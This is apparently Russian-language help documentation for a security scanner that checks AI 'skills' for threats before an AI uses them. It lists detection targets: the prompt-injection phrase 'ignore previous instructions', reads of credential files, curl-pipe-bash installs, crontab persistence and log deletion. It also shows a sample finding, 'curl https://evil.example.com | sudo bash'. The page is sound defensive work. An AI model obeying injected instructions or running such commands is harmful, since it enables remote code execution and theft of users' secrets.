Безопасность
Скилл — это инструкции, которым ваш AI будет следовать. Вредоносный скилл может попытаться заставить AI выполнить опасную команду, отправить ваши данные на чужой сервер или тихо изменить своё поведение. Сканер безопасности onplate ловит такие вещи до того, как скилл попадёт к AI.
Что ищет сканер
- Prompt injection — скрытые указания вида «игнорируй предыдущие инструкции»;
- Попытки украсть данные — инструкции отправить содержимое файлов или переписки наружу;
- Утечка секретов — чтение
~/.aws/credentials,~/.ssh/id_rsa,.env, Keychain и других хранилищ ключей; - Подозрительные shell-команды — то, что может удалить файлы, скачать и запустить код или поднять права через
sudo; - Небезопасная установка —
curl … | bash,pip installиз непроверенного источника (supply chain); - Закрепление в системе — правка
crontab, автозапуска, профилей оболочки, чтобы скилл возвращался сам; - Сокрытие следов —
chmod 777, отключение истории, удаление логов; - Скрытые unicode-символы — невидимые знаки, которыми маскируют вредоносный текст;
- Base64-вставки — закодированные фрагменты, которые не прочитать глазами;
- Ссылки на внешние URL — с учётом вашего списка доверенных доменов.
Сканер также распознаёт обфускацию — попытки замаскировать опасную конструкцию, чтобы обойти проверку, — и многострочные команды, склеенные переносом строки, чтобы разорванный на части curl … \ + | bash не проскользнул мимо. Такие находки помечаются отдельно.
Оценка
По результатам скилл получает одну из оценок и числовой риск от 0 до 100, а рядом — уверенность сканера (высокая / средняя / низкая: там, где сработала эвристика или обфускация, уверенность ниже).
| Оценка | Что значит | Что делать |
|---|---|---|
| Безопасно | Находок нет или только информационные | Пользуйтесь спокойно |
| Подозрительно | Есть места, требующие взгляда человека | Просмотрите находки |
| Опасно | Найдены опасные конструкции | Установка потребует явного обоснования |
Над списком находок — две сводки: внешние адреса (все хосты, к которым обращается скилл, — сразу видно, куда могут уйти данные) и возможности (какие инструменты и права запрашивает скилл или субагент).
Что показывает находка
Каждая находка — это не просто ярлык «bash». Видно, что именно сработало:
- Что сработало — строка-улика целиком: реальная команда
curl https://evil.example.com | sudo bash, а не абстрактная категория; опасный фрагмент подсвечен внутри строки; - Уровень — инфо / предупреждение / опасность — и номер строки в скилле;
- короткое объяснение простыми словами, почему это вообще находка;
- Что делать — конкретная рекомендация, как убрать или обезопасить конструкцию.
Находки сгруппированы по смыслу (инъекция, секреты, команды, закрепление, сеть, возможности…), чтобы однотипное было рядом. Опасные строки подсвечиваются красным прямо в тексте скилла.
Где работает проверка
Проверка встроена везде, где скилл попадает в систему:
- при добавлении и в Маркетплейсе — автоматически;
- при установке опасного скилла — потребуется обоснование;
- в разделе Безопасность — вручную.
На Дашборде всегда видно, сколько скиллов не проверено или требует внимания.
Что на странице «Безопасность»
Сверху — два действия, ради которых сюда и заходят:
- Проверка скилла — выберите скилл из хранилища и нажмите Сканировать;
- Проверка произвольного текста — вставьте чужой скилл в поле и нажмите Проверить текст. Удобно, чтобы посмотреть на скилл ещё до того, как добавлять его себе.
Ниже — четыре свёрнутых раздела; каждый показывает в заголовке, что внутри, так что разворачивать их приходится редко:
| Раздел | Что внутри |
|---|---|
| Доверенные домены | список доменов и их количество |
| Заглушённые находки | сколько правил вы решили не считать находкой везде |
| Аналитика отметок | по скольким правилам вы снимали находки |
| Мастер-ключ | шифрование сохранённых ключей площадок |
Раздел с ошибкой раскрывается сам — прятать сообщение о том, что список доменов не сохранился, было бы нечестно.
Работа с находками
Сканер бывает перестраховщиком — это нормально. Каждую находку можно разобрать:
- Принять риск — «я видел, понимаю и осознанно оставляю» (можно добавить комментарий, почему);
- Ложное — сканер ошибся, это не угроза;
- Не считать находкой везде — если правило шумит не в одном скилле, а во всём каталоге. Такая находка помечается «заглушено везде» и перестаёт учитываться в оценках повсюду, пока вы не нажмёте Вернуть в находки.
Первые две отметки касаются одной записи, третья — всего каталога. Все заглушённые правила собраны в разделе Заглушённые находки на странице «Безопасность», чтобы решение не потерялось.
Отмеченные находки перестают влиять на оценку, но остаются в истории: у скилла появляется пометка «Проверено пользователем» со списком снятых угроз.
Правила сканера со временем усиливаются. Если после обновления правил ваше старое исключение перестало покрывать находку, она помечается «исключение устарело» — нажмите Подтвердить заново или Вернуть находку в силу. Раздел Аналитика отметок показывает сводку: по каким правилам вы чаще всего снимаете находки.
Доверенные домены
Список доменов, ссылкам на которые вы доверяете (по одному на строку). Ссылки на все остальные домены будут повышаться в подозрительности. Пустой список выключает политику — все ссылки считаются информационными.
Мастер-ключ
API-ключи площадок и секреты MCP-серверов хранятся в зашифрованном виде. Кнопка Сменить мастер-ключ генерирует новый ключ шифрования и перешифровывает всё сохранённое — например, если вы подозреваете, что к компьютеру был доступ.